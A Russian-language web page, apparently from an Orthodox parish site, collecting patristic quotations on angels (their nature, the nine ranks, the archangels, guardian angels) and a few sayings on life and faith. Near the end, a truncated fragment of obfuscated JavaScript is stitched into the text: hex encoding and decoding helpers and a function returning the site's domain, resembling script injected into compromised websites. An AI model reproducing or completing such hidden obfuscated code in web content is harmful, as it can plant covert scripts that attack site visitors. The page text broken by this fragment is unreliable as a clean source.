Из Энциклопедии изречений Святых отцов и учителей Церкви по различным вопросам духовной жизни
Об ангелах
Природа Ангелов
Ангелам, которые не имеют никакого покрова, подобного нашей плоти, ничто не препятствует непрестанно взирать на лице славы Божией. Святитель Василий Великий (4, 264).
Творение Ангелов
Никто из верных не сомневается, что прежде сотворения видимого мира Богсотворил духовные и небесные силы, которые, зная, что они сотворены из небытия для великой славы блаженства, по благости Творца, воссылают Ему постоянное благодарение и непрестанно прославляют Его. Преподобный Иоанн Кассиан Римлянин (Авва Серен 53, 309).
Бог сотворил Ангелов и Архангелов сразу всех одновременно, а их так много, что они превосходят всякое число. Святитель Иоанн Златоуст (40, 774).
Иерархия Бесплотных Сил
Хотя служебные духи на небесах нетленны и бессмертны, Бог не благоволил, чтобы все они состояли в одном чине. Напротив, установлено, чтобы и у Божественных служителей были начала, власти и преимущества. ПреподобныйЕфрем Сирин (25, 225).
Девять чинов Ангелов имеют наименования, сообразно их природе и деятельности – Престолы, Херувимы, Серафимы, Силы,, Господства, Власти, Начала, Архангелы и Ангелы. Называются они бесплотными, потому что невещественны; умными, так как они – умы; и воинствами, поскольку они «служебные духи» (Евр. 1:14) Царя Всяческих. Кроме того, они имеют имена общие и собственные, то есть называются Силами и Ангелами. Первое есть собственное название одного чина, но по деятельности своей все девять чинов называются Силами, ибо все могут приводить в исполнение Божественную волю. Ангелы тоже собственное имя одного из чинов, первого от нас и девятого от Страшного Престола; по деятельности же все называются Ангелами (Вестниками), как возвещающие людям Божественные повеления.Преподобный Петр Дамаскин (63, 76).
Михаил1 — служитель божественной славы, страж и защитник чести Божией.
Гавриил2 — служитель божественной крепости и изъявитель сокровенных таинств Божиих.
Рафаил3 — служитель божественных исцелений, чудесно изливаемых свыше на немощное естество.
Уриил4 — служитель божественной любви, свет и огонь, освещающий познанием Бога и воспламеняющий сердца человеческие божественной любовью.
Селафиил5 — служитель божественных молений, всегда молящийся Богу о роде человеческом, учащий людей усердной, богомысленной и умиленной молитве и возбуждающий к ней.
Иегудиил6 — служитель божественных хвалений и исповеданий, помощник в трудах и подвигах, укрепляющий тех, которые в чем-либо трудятся ради славы имени Господня, ходатайствующий и готовящий им за это воздаяние от Бога.
Варахиил7 — служитель божественных благословений и дарований, посылаемых людям благоутробием Божиим. Святитель Димитрий Ростовский (103, 816) 8 .
Ангелы служат человеку
Чудесно, что видимый свет, по велению Божию, создан для нас, но еще чудеснее, что и святые Ангелы служат нашему спасению. «Ангел Господень ополчается вокруг боящихся Его» (Пс. 33:8). «Не все ли они суть служебные духи, посылаемые на служение для тех, которые имеют наследовать спасение?» (Евр.1:14). Преисполнен им Ветхий Завет, но и в Новом Завете много такого служения. Ангел благовествует Пресвятой Деве Сына Божия, грядущего в мир и от Нее рождаемого плотью (Лк. 1:26—38). Ангел является Иосифу, Ее обручнику (Мф. 1:20; 2, 13 и 19). Ангел является Захарии и благовествует зачатие Предтечи (Лк. 1:8—13). Ангел благовествует пастырям Рождество Христа, Спасителя мира (Лк. 2:9—11). Ангелы сидят на гробе Воскресшего Христа и проповедают женам Воскресение (Лк. 24:4—6). Ангелы являются Апостолам при Вознесении Господнем и возвещают им Второе Пришествие Христово (Деян. 1:10—11). Ангел изводит Петра из темницы (Деян. 12:7—9). Ангел говорит Филиппу: «Встань и иди» (Деян. 8:26). Ангел является Корнилию сотнику (Деян. 10:1—6) . О том же повествует церковная история. «Ангел хранитель дается всякому верному и всегда видит лице Отца Небесного», пишет Василий Великий. Эти святые и блаженные духи содействуют нашему спасению, чтобы мы усердно служили их и нашему Господу и так спасались. Святитель Тихон Задонский (104, 5—6).
См. также Деян. 12:5—11.
Эти Умы (Ангелы) приняли каждый какую-либо одну часть вселенной, или приставлены к чему-нибудь одному в мире, как это было ведомо все Устроившему и Распределившему. И все они имеют одно назначение – по мановению Зиждителя всяческих воспевают Божие величие, созерцают вечную славу, и притом вечно… Святитель Григорий Богослов (13, 50).
Они (Ангелы) охраняют части земли, правят народами и местами, как поставлены на то Творцом. Преподобный Иоанн Дамаскин (113, 130).
Ангелы всюду присутствуют и особенно в доме Божием предстоят Царю, и все исполнено этими бесплотными силами. Святитель Иоанн Златоуст (46, 142).
Я уверен, что особый Ангел покровительствует каждой Церкви, как учит меня Иоанн в Апокалипсисе (1, 20). Святитель Амвросий Медиоланский (113, 130).
К каждому из верных приставлен Ангел, достойный того, чтобы видеть Отца Небесного… Что с каждым из верных есть Ангел, который как воспитатель и пастырь управляет его жизнью, против этого никто не будет спорить, помня слова Господа: «не презирайте ни одного из малых сих; ибо говорю вам, что Ангелы их на небесах всегда видят лице Отца Моего Небесного» (Мф. 18:10). И псалмопевец говорит: «Ангел Господень ополчается вокруг боящихся Его» (Пс.33:8). Ангел не отступит от всех уверовавших в Господа, если только не отгоним его сами плохими делами. Как пчел отгоняет дым и голубей смрад, так и хранителя нашей жизни, Ангела, отдаляет прискорбный и смердящий грех… Поскольку святого Ангела, ополчающегося вокруг боящихся Господа, имеет каждый из нас, то грехи могут стать причиной бедствия: нас перестанет закрывать стена, то есть святые силы, которые делают людей непобедимыми, пока пребывают с ними (113, 131).
О жизни и вере
Святитель Василий Великий
«Жизнь человеческая – непостоянное море, зыбкий воздух, неуловимое сновидение, утекающий поток, исчезающий дым, бегущая тень, воды, колеблемые волнами. И хотя буря страшна, плавание опасно, однако же мы, пловцы, беспечно спим. Страшно и свирепо море жизни, суетны надежды, надмевающие, подобно бурям. Скорби вздымаются, как волны, злоумышления скрываются, как подводные камни; враги лают, как псы; похитители окружают, как морские разбойники; приходит старость, как зима; наступает смерть, как кораблекрушение. Видишь бурю – правь искуснее, смотри, как плывешь, не затопи ладьи своей, перегрузив ее или богатством, приобретаемым неправдою, или бременем страстей».
Пощёчина и милостыня
Не бойся, ты не одинок. Одинок тот, кто не знает Бога, даже если имеет в друзьях полмира.
—
Не видите ли, что пчела, ужалив, умирает? Через это насекомое Бог учит нас тому, чтобы мы не оскорбляли ближних, потому что в таком случае сами наперед подвергаемся смерти. Уязвляя их, мы, может быть, причиняем им некоторую боль, но сами, подобно этому насекомому, уже не остаемся живы.
—
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hramloboykovka.church.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Просмотры (80)